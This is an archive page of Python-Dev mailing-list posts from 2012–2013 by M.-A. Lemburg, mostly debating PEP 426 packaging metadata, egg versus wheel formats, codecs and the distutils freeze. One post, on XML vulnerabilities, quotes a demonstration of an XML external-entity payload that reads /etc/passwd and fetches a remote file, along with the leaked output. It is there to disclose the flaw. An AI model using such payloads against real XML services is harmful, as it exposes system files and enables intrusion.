Re: [Python-Dev] Why can't I encode/decode base64 without importing a module?

2013-04-23 Thread M.-A. Lemburg
On 23.04.2013 17:47, Guido van Rossum wrote:
 On Tue, Apr 23, 2013 at 8:22 AM, M.-A. Lemburg m...@egenix.com wrote:
 Just as reminder: we have the general purpose
 encode()/decode() functions in the codecs module:

 import codecs
 r13 = codecs.encode('hello world', 'rot-13')

 These interface directly to the codec interfaces, without
 enforcing type restrictions. The codec defines the supported
 input and output types.
 
 As an implementation mechanism I see nothing wrong with this. I hope
 the codecs module lets you introspect the input and output types of a
 codec given by name?

At the moment there is no standard interface to access supported
input and output types... but then: regular Python functions or
methods also don't provide such functionality, so no surprise
there ;-)

It's mostly a matter of specifying the supported type
combinations in the codec documentation.

BTW: What would be a use case where you'd want to
programmatically access such information before calling
the codec ?

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Apr 23 2013)
 Python Projects, Consulting and Support ...   http://www.egenix.com/
 mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2013-04-17: Released eGenix mx Base 3.2.6 ... http://egenix.com/go43

: Try our mxODBC.Connect Python Database Interface for free ! ::

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] XML DoS vulnerabilities and exploits in Python

2013-02-24 Thread M.-A. Lemburg
Reminds me of the encoding attacks that were possible in earlier
versions of Python... you could have e.g. an email processing
script run the Python test suite by simply sending a specially
crafted email :-)

On 21.02.2013 13:04, Christian Heimes wrote:
 Am 21.02.2013 11:32, schrieb Antoine Pitrou:
 You haven't proved that these were actual threats, nor how they
 actually worked. I'm gonna remain skeptical if there isn't anything
 more precise than It highly depends on the parser and the application
 what kind of exploit is possible.
 
 https://bitbucket.org/tiran/defusedxml/src/82f4037464418bf11ea734969b7ca1c193e6ed91/other/python-external.py?at=default
 
 $ ./python-external.py
 
 REQUEST:
 
 weatherAachen/weather
 
 RESPONSE:
 -
 weatherThe weather in Aachen is terrible./weather
 
 
 REQUEST:
 
 ?xml version=1.0 encoding=utf-8?
 !DOCTYPE weather [
 !ENTITY passwd SYSTEM file:///etc/passwd
 ]
 weatherpasswd;/weather
 
 
 RESPONSE:
 -
 errorUnknown city root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/bin/sh
 man:x:6:12:man:/var/cache/man:/bin/sh
 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 mail:x:8:8:mail:/var/mail:/bin/sh
 news:x:9:9:news:/var/spool/news:/bin/sh
 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:x:13:13:proxy:/bin:/bin/sh
 www-data:x:33:33:www-data:/var/www:/bin/sh
 backup:x:34:34:backup:/var/backups:/bi/error
 
 
 REQUEST:
 
 ?xml version=1.0 encoding=utf-8?
 !DOCTYPE weather [
 !ENTITY url SYSTEM
 http://hg.python.org/cpython/raw-file/a11ddd687a0b/Lib/test/dh512.pem;
 ]
 weatherurl;/weather
 
 
 RESPONSE:
 -
 errorUnknown city -BEGIN DH PARAMETERS-
 MEYCQQD1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zafq9AKUJsCRtMIPWak
 XUGfnHy9iUsiGSa6q6Jew1XpKgVfAgEC
 -END DH PARAMETERS-
 
 These are the 512 bit DH parameters from Assigned Number for SKIP
 Protocols
 (http://www.skip-vpn.org/spec/numbers.html).
 See there for how they were generated.
 Note that g is not a generator, but this is not a problem since p is a
 safe prime.
 /error
 
 
 Q.E.D.
 Christian
 ___
 Python-Dev mailing list
 Python-Dev@python.org
 http://mail.python.org/mailman/listinfo/python-dev
 Unsubscribe: 
 http://mail.python.org/mailman/options/python-dev/mal%40egenix.com
 

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 24 2013)
 Python Projects, Consulting and Support ...   http://www.egenix.com/
 mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


: Try our mxODBC.Connect Python Database Interface for free ! ::

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0

2013-02-20 Thread M.-A. Lemburg
On 20.02.2013 03:37, Paul Moore wrote:
 On 20 February 2013 00:54, Fred Drake f...@fdrake.net wrote:
 I'd posit that anything successful will no longer need to be added to
 the standard library, to boot.  Packaging hasn't done well there.
 
 distlib may be the exception, though. Packaging tools are somewhat
 unique because of the chicken and egg issue involved in having a
 packaging tool with external dependencies - who installs your
 dependencies for you? So enabling technology (library code to perform
 packaging-related tasks, particularly in support of standardised
 formats) could be better available from the stdlib.
 
 I'd rather see a successful packaging story develop than bundle it into the
 standard library.  The later just isn't that interesting any more.
 
 Bundling too early is a bad idea though. distlib is developing fast
 and to do so it needs (1) a development cycle independent of python's
 and (2) compatibility and ease of use with earlier versions of Python
 (the latter is also critical for adoption in place of custom code in
 packaging tools).
 
 Aiming for an accelerated level of development targeting inclusion in
 Python 3.4 is plausible, though. MAL pointed out that agreeing
 standards but not offering tools to support them in the stdlib is
 risky, as people have no incentive to adopt those standards. We've got
 6 months or more until 3.4 feature freeze, let's not make any decision
 too soon, though.

I'm fine with not adding distlib to Python 3.4. The point I wanted
to make was that there has to be an reference implementation of the PEP
that tool makers can use to avoid reinventing the wheel over and over
again (each with its own set of problems).

If distlib implements the PEP, then it just needs to be
mentioned there as a suitable reference implementation.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 20 2013)
 Python Projects, Consulting and Support ...   http://www.egenix.com/
 mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


: Try our mxODBC.Connect Python Database Interface for free ! ::

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0

2013-02-20 Thread M.-A. Lemburg
On 20.02.2013 00:16, Daniel Holth wrote:
 On Tue, Feb 19, 2013 at 5:10 PM, M.-A. Lemburg m...@egenix.com wrote:
 
 On 19.02.2013 23:01, Daniel Holth wrote:
 On Tue, Feb 19, 2013 at 4:34 PM, M.-A. Lemburg m...@egenix.com wrote:

 On 19.02.2013 14:40, Nick Coghlan wrote:
 On Tue, Feb 19, 2013 at 11:23 PM, M.-A. Lemburg m...@egenix.com
 wrote:
 * PEP 426 doesn't include any mention of the egg distribution format,
   even though it's the most popular distribution format at the moment.
   It should at least include the location of the metadata file
   in eggs (EGG-INFO/PKG-INFO) and egg installations
   (eggdir/EGG-INFO/PKG-INFO).

 Other tools involved in Python distribution may also use this format.

 The egg format has never been, and never will be, officially endorsed
 by python-dev. The wheel format is the standard format for binary
 distribution, and PEP 376 defines the standard location for metadata
 on installed distributions.

 Oh, come on, Nick, that's just silly. setuptools was included in stdlib
 for a short while, so the above is simply wrong. Eggs are the most
 widely used binary distribution format for Python package on PyPI:

 # wc *files.csv
   25585   25598 1431013 2013-02-19-egg-files.csv
46194640  236694 2013-02-19-exe-files.csv
 254 255   13402 2013-02-19-msi-files.csv
  104691  104853 5251962 2013-02-19-tar-gz-files.csv
  24  241221 2013-02-19-whl-files.csv
   17937   18022  905913 2013-02-19-zip-files.csv
  153110  153392 7840205 total

 (based on todays PyPI stats)

 It doesn't really help ignoring realities... and I'm saying
 that as one of the core devs who got setuptools kicked out of
 the stdlib again.

 --
 Marc-Andre Lemburg
 eGenix.com


 The wheel philosophy is that it should be supported by both python-dev
 and
 setuptools and that you should feel happy about using setuptools if you
 like it whether or not python-dev (currently) endorses that. If you are
 using setuptools (distribute's pkg_resources) then you can use both at
 the
 same time.

 Distribute, distutils and setuptools' problems have not been well
 understood which I think is why there has been a need to discredit
 setuptools by calling it non-standard. It is the defacto standard. If
 your
 packages have dependencies there is no other choice. Wheel tries to solve
 the real problem by allowing you to build a package with setuptools while
 giving the end-user the choice of installing setuptools or not.

 Of course eggs are the most popular right now. The wheel format is very
 egg-like while avoiding some of egg's problems. See the comparison in the
 PEP or read the story on wheel's rtfd. The wheel project includes tools
 to
 losslessly convert eggs or bdist_wininst to wheel.

 That's all fine, but it doesn't explain the refusal to add the
 documentation of the location of the PKG-INFO file in eggs ?
 
 
 It would just be a sentence, I wouldn't have a problem with it but I also
 don't see why it would be necessary. Even setuptools doesn't touch the file
 usually. Right now distribute's pkg_resources currently only understands
 Requires-Dist if it is inside a .dist-info directory.

Perhaps I'm not clear enough. I'll try again :-)

The wording in the PEP alienates the egg format by defining
an incompatible new standard for the location of the metadata
file:


There are three standard locations for these metadata files:

* the PKG-INFO file included in the base directory of Python source 
distribution archives (as
created by the distutils sdist command)
* the {distribution}-{version}.dist-info/METADATA file in a wheel binary 
distribution archive (as
described in PEP 425, or a later version of that specification)
* the {distribution}-{version}.dist-info/METADATA files in a local Python 
installation database (as
described in PEP 376, or a later version of that specification)


It's easy to upgrade distribute and distutils to write
metadata 1.2 format, simply by changing the version in the
PKG-INFO files.

These addition are necessary to fix the above and also include
the standard location of the metadata for pip and distutils installations:

* the EGG-INFO/PKG-INFO file in an egg binary distribution archive (as created 
by the distribute
bdist_egg command)

* the {distribution}-{version}.egg/EGG-INFO/PKG-INFO file in an installed egg 
distribution archive

* the {distribution}-{version}.egg-info/PKG-INFO file for packages installed 
with pip install or
distribute's python setup.py install

* the {distribution}-{version}.egg-info file for packages installed with 
distutils' python setup.py
install

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 20 2013)
 Python Projects, Consulting and Support ...   http://www.egenix.com/
 mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


: Try our

Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0

2013-02-19 Thread M.-A. Lemburg


On 17.02.2013 11:11, Nick Coghlan wrote:
 FYI
 
 
 -- Forwarded message --
 From: Nick Coghlan ncogh...@gmail.com
 Date: Sun, Feb 17, 2013 at 8:10 PM
 Subject: PEP 426 is now the draft spec for distribution metadata 2.0
 To: DistUtils mailing list\\ distutils-...@python.org
 
 
 The latest draft of PEP 426 is up at http://www.python.org/dev/peps/pep-0426/
 
 Major changes since the last draft:
 
 1. Metadata-Version is 2.0 rather than 1.3, and the field now has the
 same major.minor semantics as are defined for wheel versions in PEP
 427 (i.e. if a tool sees a major version number it doesn't recognise,
 it should give up rather than trying to guess what to do with it,
 while it's OK to process a higher minor version)
 
 2. The Private-Version field is added, and several examples are
 given showing how to use it in conjunction with translated public
 versions when a project wants to use a version numbering scheme that
 the standard installation tools won't understand.
 
 3. The environment markers section more clearly covers the need to
 handle parentheses (this was mentioned in the text, but not the
 pseudo-grammar), and the fields which support those markers have an
 explicit cross-reference to that section of the spec.
 
 4. Leading/trailing whitespace and date based versioning are
 explicitly excluded from valid public versions
 
 5. Version compatibility statistics are provided for this PEP relative
 to PEP 386 (the analysis script has been added to the PEP repo if
 anyone wants to check my numbers)
 
 6. I have reclaimed BDFL-Delegate status (with Guido's approval)
 
 Since getting wheel support into pip no longer depends on this version
 of the metadata spec, I plan to leave it open for comment for another
 week, and then accept it next weekend if I don't hear any significant
 objections.

Overall, I think the meta data for Python packages is getting
too complicated.

Without a support module in the stdlib implementing the required
parsing, evaluation and formatting mechanisms needed to analyze and
write the format, I'm -1 on adding yet another format version on top
of the stack.

At the moment, discussing yet another version update is mostly academic,
since not even version 1.2 has been picked up by the tools yet:

distutils still writes version 1.1 meta data and doesn't
even understand 1.2 meta data.

The only tool in wide spread use that understands part of the 1.2 data
is setuptools/distribute, but it can only understand the Requires-Dist
field of that version of the spec (only because the 1.1 Requires field was
deprecated) and interprets a Provides-Extra field which isn't
even standard. All other 1.2 fields are ignored.
setuptools/distribute still writes 1.1 meta-data.

I've never seen environment markers being used or supported
in the wild.

I'm not against modernizing the format, but given that version 1.2
has been out for around 8 years now, without much following,
I think we need to make the implementation bit a requirement
before accepting the PEP.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 19 2013)
 Python Projects, Consulting and Support ...   http://www.egenix.com/
 mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


: Try our mxODBC.Connect Python Database Interface for free ! ::

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0

2013-02-19 Thread M.-A. Lemburg
On 19.02.2013 11:28, Nick Coghlan wrote:
 On Tue, Feb 19, 2013 at 7:37 PM, M.-A. Lemburg m...@egenix.com wrote:
 On 17.02.2013 11:11, Nick Coghlan wrote:
 I'm not against modernizing the format, but given that version 1.2
 has been out for around 8 years now, without much following,
 I think we need to make the implementation bit a requirement
 before accepting the PEP.
 
 It is being implemented in distlib, and the (short!) appendix to the
 PEP itself shows how to read the format using the standard library's
 email module.

Hmm, what is distlib and where does it live ?

The PEP only shows how to parse the RFC822-style format used by the
metadata. That's not what I was referring to.

If a tools wants to support metadata 2.0, it has to support all
the complicated stuff as well, i.e. handle the requires fields,
the environment markers and version comparisons/sorting.

 v2.0 is designed to fix many of the issues that prevented the adoption
 of v1.2, including tweaks to the standardised version scheme and the
 addition of a formal extension mechanism to avoid the ad hoc
 extensions that occurred with earlier metadata versions.

Some more notes:

* I find it confusing that we now have two version schemes,
  one defined in PEP 426 (hidden in the middle of the document)
  and one in PEP 386. It would be better to amend or replace
  PEP 386, since that's where you look for Python version strings.

* PEP 426 doesn't include any mention of the egg distribution format,
  even though it's the most popular distribution format at the moment.
  It should at least include the location of the metadata file
  in eggs (EGG-INFO/PKG-INFO) and egg installations
  (eggdir/EGG-INFO/PKG-INFO).

Not sure whether related or not, I also think it would be a good idea
to make the metadata file available on PyPI for download (could be sent
there when registering the package release). The register command
only posts the data as 1.0 metadata, but includes fields from
metadata 1.1. PyPI itself only displays part of the data.

It would be useful to have the metadata readily available for
inspection on PyPI without having to download one of the
distribution files first.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 19 2013)
 Python Projects, Consulting and Support ...   http://www.egenix.com/
 mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


: Try our mxODBC.Connect Python Database Interface for free ! ::

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0

2013-02-19 Thread M.-A. Lemburg
On 19.02.2013 14:40, Nick Coghlan wrote:
 On Tue, Feb 19, 2013 at 11:23 PM, M.-A. Lemburg m...@egenix.com wrote:
 * PEP 426 doesn't include any mention of the egg distribution format,
   even though it's the most popular distribution format at the moment.
   It should at least include the location of the metadata file
   in eggs (EGG-INFO/PKG-INFO) and egg installations
   (eggdir/EGG-INFO/PKG-INFO).
 
 Other tools involved in Python distribution may also use this format.
 
 The egg format has never been, and never will be, officially endorsed
 by python-dev. The wheel format is the standard format for binary
 distribution, and PEP 376 defines the standard location for metadata
 on installed distributions.

Oh, come on, Nick, that's just silly. setuptools was included in stdlib
for a short while, so the above is simply wrong. Eggs are the most
widely used binary distribution format for Python package on PyPI:

# wc *files.csv
  25585   25598 1431013 2013-02-19-egg-files.csv
   46194640  236694 2013-02-19-exe-files.csv
254 255   13402 2013-02-19-msi-files.csv
 104691  104853 5251962 2013-02-19-tar-gz-files.csv
 24  241221 2013-02-19-whl-files.csv
  17937   18022  905913 2013-02-19-zip-files.csv
 153110  153392 7840205 total

(based on todays PyPI stats)

It doesn't really help ignoring realities... and I'm saying
that as one of the core devs who got setuptools kicked out of
the stdlib again.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 19 2013)
 Python Projects, Consulting and Support ...   http://www.egenix.com/
 mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


: Try our mxODBC.Connect Python Database Interface for free ! ::

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0

2013-02-19 Thread M.-A. Lemburg
On 19.02.2013 14:40, Nick Coghlan wrote:
 On Tue, Feb 19, 2013 at 11:23 PM, M.-A. Lemburg m...@egenix.com wrote:
 On 19.02.2013 11:28, Nick Coghlan wrote:
 On Tue, Feb 19, 2013 at 7:37 PM, M.-A. Lemburg m...@egenix.com wrote:
 On 17.02.2013 11:11, Nick Coghlan wrote:
 I'm not against modernizing the format, but given that version 1.2
 has been out for around 8 years now, without much following,
 I think we need to make the implementation bit a requirement
 before accepting the PEP.

 It is being implemented in distlib, and the (short!) appendix to the
 PEP itself shows how to read the format using the standard library's
 email module.

 Hmm, what is distlib and where does it live ?
 
 As part of the post-mortem of packaging's removal from Python 3.3,
 several subcomponents were identified as stable and useful. distlib is
 those subcomponents extracted into a separate repository by Vinay
 Sajip.
 
 It will be proposed as the standard library infrastructure for
 building packaging related tools, while distutils will become purely a
 build system and have nothing to do with installing software directly
 (except perhaps on developer machines).

Shouldn't those details be mentioned in the PEP ?

 The PEP only shows how to parse the RFC822-style format used by the
 metadata. That's not what I was referring to.

 If a tools wants to support metadata 2.0, it has to support all
 the complicated stuff as well, i.e. handle the requires fields,
 the environment markers and version comparisons/sorting.
 
 Which is what distutils2 can be used for now, and what distlib will
 provide without the unwanted build system infrastructure in
 distutils2.

 v2.0 is designed to fix many of the issues that prevented the adoption
 of v1.2, including tweaks to the standardised version scheme and the
 addition of a formal extension mechanism to avoid the ad hoc
 extensions that occurred with earlier metadata versions.

 Some more notes:

 * I find it confusing that we now have two version schemes,
   one defined in PEP 426 (hidden in the middle of the document)
   and one in PEP 386. It would be better to amend or replace
   PEP 386, since that's where you look for Python version strings.
 
 You can't understand version specifiers without understanding the sort
 order defined for the version scheme, so documenting them separately
 is just a recipe for confusion.

PEP 386 defines both. The point here is that the version scheme
goes far beyond the metadata format and is complicated enough
to warrant a separate PEP.

 I plan to mark PEP 386 as Withdrawn when I accept this PEP, as the
 sorting scheme it defines is broken, and the distutils changes
 proposed in that PEP are never going to happen.

Hmm, Tarek is the author, so only he can withdraw the PEP, AFAIK.

 * PEP 426 doesn't include any mention of the egg distribution format,
   even though it's the most popular distribution format at the moment.
   It should at least include the location of the metadata file
   in eggs (EGG-INFO/PKG-INFO) and egg installations
   (eggdir/EGG-INFO/PKG-INFO).
 
 Other tools involved in Python distribution may also use this format.
 
 The egg format has never been, and never will be, officially endorsed
 by python-dev. The wheel format is the standard format for binary
 distribution, and PEP 376 defines the standard location for metadata
 on installed distributions.

See my other reply.


 Not sure whether related or not, I also think it would be a good idea
 to make the metadata file available on PyPI for download (could be sent
 there when registering the package release). The register command
 only posts the data as 1.0 metadata, but includes fields from
 metadata 1.1. PyPI itself only displays part of the data.
 
 It's not related, but I plan to propose the adoption of TUF (with GPG
 based signatures) for PyPI's end-to-end security solution, and the
 conversion of the metadata files to JSON for distribution through
 TUF's metadata support. (Donald Stufft already wrote  PEP 426 - JSON
 bidirectional converter as part of an unrelated experiment)

Why convert the metadata format you are defining in PEP 426
to yet another format when it can be uploaded as file straight
to PyPI ?

TUF doesn't have anything to do with that, agreed ;-)

 It would be useful to have the metadata readily available for
 inspection on PyPI without having to download one of the
 distribution files first.
 
 Indeed, which is a large part of why TUF (aka The Update Framework:
 https://www.updateframework.com/) is such an interesting security
 solution.

The suggestion to have the metadata available on PyPI doesn't
have anything to do with security.

It's about being able to determine compatibility and select the
right distribution file for download. The metadata also helps in
creating dependency graphs, which are useful for a lot of things.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 19 2013)
 Python Projects, Consulting

Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0

2013-02-19 Thread M.-A. Lemburg
On 19.02.2013 23:01, Daniel Holth wrote:
 On Tue, Feb 19, 2013 at 4:34 PM, M.-A. Lemburg m...@egenix.com wrote:
 
 On 19.02.2013 14:40, Nick Coghlan wrote:
 On Tue, Feb 19, 2013 at 11:23 PM, M.-A. Lemburg m...@egenix.com wrote:
 * PEP 426 doesn't include any mention of the egg distribution format,
   even though it's the most popular distribution format at the moment.
   It should at least include the location of the metadata file
   in eggs (EGG-INFO/PKG-INFO) and egg installations
   (eggdir/EGG-INFO/PKG-INFO).

 Other tools involved in Python distribution may also use this format.

 The egg format has never been, and never will be, officially endorsed
 by python-dev. The wheel format is the standard format for binary
 distribution, and PEP 376 defines the standard location for metadata
 on installed distributions.

 Oh, come on, Nick, that's just silly. setuptools was included in stdlib
 for a short while, so the above is simply wrong. Eggs are the most
 widely used binary distribution format for Python package on PyPI:

 # wc *files.csv
   25585   25598 1431013 2013-02-19-egg-files.csv
46194640  236694 2013-02-19-exe-files.csv
 254 255   13402 2013-02-19-msi-files.csv
  104691  104853 5251962 2013-02-19-tar-gz-files.csv
  24  241221 2013-02-19-whl-files.csv
   17937   18022  905913 2013-02-19-zip-files.csv
  153110  153392 7840205 total

 (based on todays PyPI stats)

 It doesn't really help ignoring realities... and I'm saying
 that as one of the core devs who got setuptools kicked out of
 the stdlib again.

 --
 Marc-Andre Lemburg
 eGenix.com

 
 The wheel philosophy is that it should be supported by both python-dev and
 setuptools and that you should feel happy about using setuptools if you
 like it whether or not python-dev (currently) endorses that. If you are
 using setuptools (distribute's pkg_resources) then you can use both at the
 same time.
 
 Distribute, distutils and setuptools' problems have not been well
 understood which I think is why there has been a need to discredit
 setuptools by calling it non-standard. It is the defacto standard. If your
 packages have dependencies there is no other choice. Wheel tries to solve
 the real problem by allowing you to build a package with setuptools while
 giving the end-user the choice of installing setuptools or not.
 
 Of course eggs are the most popular right now. The wheel format is very
 egg-like while avoiding some of egg's problems. See the comparison in the
 PEP or read the story on wheel's rtfd. The wheel project includes tools to
 losslessly convert eggs or bdist_wininst to wheel.

That's all fine, but it doesn't explain the refusal to add the
documentation of the location of the PKG-INFO file in eggs ?

 I am confident distlib can thrive outside of the standard library! Why the
 rush to kill it before its prime?

Who's trying to kill distlib ?

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 19 2013)
 Python Projects, Consulting and Support ...   http://www.egenix.com/
 mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


: Try our mxODBC.Connect Python Database Interface for free ! ::

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] BDFL delegation for PEP 426 + distutils freeze

2013-02-04 Thread M.-A. Lemburg
On 03.02.2013 19:33, Éric Araujo wrote:
 I vote for removing the distutils is frozen principle.
 I’ve also been thinking about that.  There have been two exceptions to
 the freeze, for ABI flags in extension module names and for pycache
 directories.  When the stable ABI was added and MvL wanted to change
 distutils (I don’t know to do what exactly), Tarek stood firm on the
 freeze and asked for any improvement to go into distutils2, and after
 MvL said that he would not contibute to an outside project, we merged d2
 into the stdlib.  Namespace packages did not impact distutils either.
 Now that we’ve removed packaging from the stdlib, we have two Python
 features that are not supported in the standard packaging system, and I
 agree that it is a bad thing for our users.
 
 I’d like to propose a reformulation of the freeze:
 - refactorings for the sake of cleanup are still shunned
 - fixes to really old bugs that have become the expected behavior are
   still avoided
 - fixes to follow OS changes are still allowed (we’ve had a number for
   Debian multiarch, Apple moving stuff around, Windows manifest options
   changes)
 - support for Python evolutions that involve totally new code, commands
   or setup parameters are now possible (this enables stable API support
   as well as a new bdist format)
 - behavior changes to track Python behavior changes are now possible
   (this enables recognizing namespace packages, unless we decide they
   need a new setup parameter)
 
 We’ll probably need to talk this over at PyCon (FYI I won’t be at the
 language summit but I’ll take part in the packaging mini-summit planned
 thanks to Nick).

+1 on lifting the freeze from me.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 04 2013)
 Python Projects, Consulting and Support ...   http://www.egenix.com/
 mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


: Try our mxODBC.Connect Python Database Interface for free ! ::

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] [Python-checkins] Cron docs@dinsdale /home/docs/build-devguide

2012-12-22 Thread M.-A. Lemburg


On 22.12.2012 21:36, Terry Reedy wrote:
 
 On 12/22/2012 1:30 PM, Cron Daemon wrote:
 abort: error: Connection timed out
 ___
 Python-checkins mailing list
 python-check...@python.org
 http://mail.python.org/mailman/listinfo/python-checkins
 
 As a volunteer checkin-list admin, I occasionally get messages like this:
 '''
 As list administrator, your authorization is requested for the
 following mailing list posting:
 
 List:python-check...@python.org
 From:r...@python.org
 Subject: Cron docs@dinsdale /home/docs/build-devguide
 Reason:  Message has implicit destination
 
 At your convenience, visit:
 
 http://mail.python.org/mailman/admindb/python-checkins
 
 to approve or deny the request.
 '''
 
 I always reject the requests as I don't believe these messages belong here. I 
 even asked, some
 months ago, on pydev who was responsible for the robot that sends these but 
 got no answer. Today,
 apparently, another list admin decided on the opposite response and gave 
 r...@python.org blanket
 permission to flood this list with irrelavancy. It it not my responsibility 
 and I have no idea how
 to fix it.

You can add a sender filter to have the messages automatically discarded.

 While people with push priviliges are supposed to subscribe to this list, I 
 know there is at least
 one who unsubscribed because of the volume. This will only encourage more to 
 leave, so I hope
 someone can stop it.

I think such messages should go to a sys admin list.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 22 2012)
 Python Projects, Consulting and Support ...   http://www.egenix.com/
 mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2012-12-14: Released mxODBC.Connect 2.0.2 ... http://egenix.com/go38
2013-01-22: Python Meeting Duesseldorf ... 31 days to go

: Try our mxODBC.Connect Python Database Interface for free ! ::

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] [Catalog-sig] accept the wheel PEPs 425, 426, 427

